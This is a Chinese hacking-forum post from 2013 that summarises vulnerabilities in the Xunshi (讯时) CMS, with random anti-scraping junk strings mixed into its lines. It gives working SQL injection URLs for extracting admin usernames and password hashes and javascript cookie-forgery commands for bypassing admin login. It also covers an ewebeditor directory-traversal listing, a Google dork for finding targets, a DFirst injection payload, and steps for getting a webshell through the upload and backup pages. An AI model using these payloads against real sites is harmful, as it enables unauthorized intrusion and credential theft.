找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2518|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘; r9 u9 U; f: v' v7 @: b/ v0 y
2 ~/ T2 Y$ I+ W5 ]3 Y  q5 U
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)+ }! W5 ~  H* y; D  |) [
# x5 K5 u% i! ?1 M% U0 [
以下本文总结来自黑防去年第9期杂志上的内容...* C7 {. S/ S& Q
4 ~8 _5 [5 q% Q% \. g
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
* ^  h& K& B7 W3 Y. a8 f, S+ m0 r8 ]: R" ~
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
3 F  H8 [2 J% e& a% v% S. x
: W4 t1 Y# L* Q5 r( N' |7 Z( k记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况8 P4 S0 O6 h' _
这里一个注入% s" I. s5 g/ W- z9 H; z
: R$ _/ u; m  r. p# P* l3 a
效果如图:
  c( ]/ u% V( q$ b8 c6 k
4 z+ m7 F9 ~1 y  E' n6 Z  y # M: A# f$ V' p9 N, T+ l
5 j7 l2 W; @0 n1 P; m* W
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.! ^" U- }( c$ h% {6 C

6 p9 O+ @! ]3 @: D7 x5 I密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去1 ~) `3 Z' E+ h7 e4 Z  m' b( a( f
; S& \& o! u( R9 j" R( u
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
& P7 ^1 Q( C) U4 B% u
/ M  k& K; I- u. d6 W0 }那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:6 z7 T/ j3 n/ c6 F7 Q

! h! ~" ^- P3 S; g因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
" L/ P: Q1 R% z- {0 B( c1 h  F& t; Q; S- }* P
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以$ y2 d& J! h& C, x+ M
- G5 Q, _# F: v7 d
访问这页面来列目录..步骤如下:
* q! g1 Y; D' W% a/ C7 E4 b2 K6 g0 Q+ `- g8 s& y
javascript:alert(document.cookie="admindj=1") 5 Q1 D% }& o# P' M

+ G6 e9 P0 ^' K1 U+ p: u; Qhttp://www.political-security.co ... asp?id=46&dir=../..0 t" j1 ^, X. V9 v' H- N
1 X3 z; f! [5 U+ L
效果如图:5 v; z2 X! I  x

% t& x" x% i: E; s6 L! J' w
: b$ a$ i" w3 {+ q* X5 U: M" L! g, ?7 S
这样全站目录都能瞧了..找到后台目录..进去..
$ i- N( v) r: h$ ^8 a: D+ W5 {5 g! A
, K) q( W- z1 h4 F那么进了后台怎么拿shell??上传--备份就ok了..5 N) B5 P/ w  |0 W1 {* F7 Z9 X
3 s& T( W% y% K
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..0 _" M* M$ w% U

! v# ^5 l3 x) T这个我也碰到过一次..你都可以通过列目录来实现..2 m( n& K7 R0 Z. H2 [

+ t5 d2 y: z2 g" O: n: w+ G/ G1 @; V8 I8 Ljavascript:alert(document.cookie="admindj=1")
) g) |1 i- M/ j  e1 G; q+ H* O$ ]( w: e- y
http://www.political-security.co ... p?action=BackupData 6 f# e! a) A$ X6 j9 e7 w/ y9 Y

7 M' T  N$ e" A6 c( y8 ~备份ok..) Z, T( t& l. n3 U7 u7 l
8 [9 ]! z8 p# Z! O4 d9 X
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
" _" N! w( W1 N7 v4 r) k
2 n. Z8 G. I. [, Z4 a在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
% {% P0 f1 x: K$ i& I* ]
, x8 d; B( T, G然后访问此页面进行注入..步骤如下:
& E& [& h3 }! E. k) m5 T  ?( g7 q4 _1 M) Y6 h
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
! Y3 B" w( e* F$ ]7 v7 S
9 f6 V4 g& L" ~9 y/ X然后请求admin/admin_chk.asp页面
5 I, A$ ], \9 d4 c+ H( v; p# S! u! S, S/ H7 V, l
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%" u# q1 W1 Z  p( g

: S, L8 s5 c( i, a7 X2 N% n( ]26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
2 ^6 v& k8 c2 w( y" u, G( E
9 H% i% x1 S: s  Q! s+ A效果如图所示:7 g$ e5 _6 u9 ~

, g  ^; [( a. `- l: ` & S9 \, m. o2 E
9 u8 |; l, f, T2 _2 A# A
讯时漏洞2" D: h/ ]- R& h+ E* ^- q% K/ _
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
( c0 F7 i/ R3 s4 e  t% W$ r/ x
! c6 w5 ]( n3 O, R, N% \1、/admin/admin_news_pl_view.asp?id=1
. ?9 X9 k1 C6 D; Y- h* S8 O4 m//id任意 填入以下语句
2 r8 q* [# i* e/ b( q % V2 O, g) U# l7 S0 u' ]# b
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
; ]% F3 o2 H# }! P" I7 z
" g7 r% R0 {5 n% y% |
* a1 R. I  a) R- t" D) m
6 N0 U  s' E8 `, b  [' E: ?" F9 ]" g3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
' b' j4 i( d$ t9 y# G! D
. P  |5 b; Y. h0 Z" M* u8 g8 b7 s  y0 r; i
4 B& j: ]) }1 X9 I$ i
爆出管理员帐号和密码了
7 M* d/ W/ v8 W1 E" q, G9 K! P4 [
' C9 R0 p  y7 T1 {7 e, S$ [; d6 q+ ]& l/ n& _6 H

+ ]7 I9 G# A1 u- f, }4、cookies进后台
- ]0 N3 g, g! N8 v6 x7 H
6 a1 B) L! I8 P; o- U$ k; bjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));& z6 c8 {' A& I
/ ^3 i1 d  [( y+ T2 p" T5 o, z

% ^( g9 K" d3 \8 c: B
8 r* U) b0 C# Z$ V6 J5 H5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
, F  l2 H6 e5 l: x$ F6 \  K
" g" }5 \; D% j8 V: c
. T- c  _- M% Z% A+ E) B3 Y- M- ?* n0 \; g' m% e: M+ V8 v
6、后台有上传和备份取SHELL不难。
* `7 V  G6 r! I" s 6 B6 _& t* P8 c+ `' f+ [9 p4 K
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
) Y% r- ~) K, g/ y
( Z' c* y& E2 C逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!: [1 E: N: [  ?! H

% _4 A4 a- p/ S1 a7 E8 s- K& v; s4 m- I) C% z
1 e( o& @+ K! T  X( R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表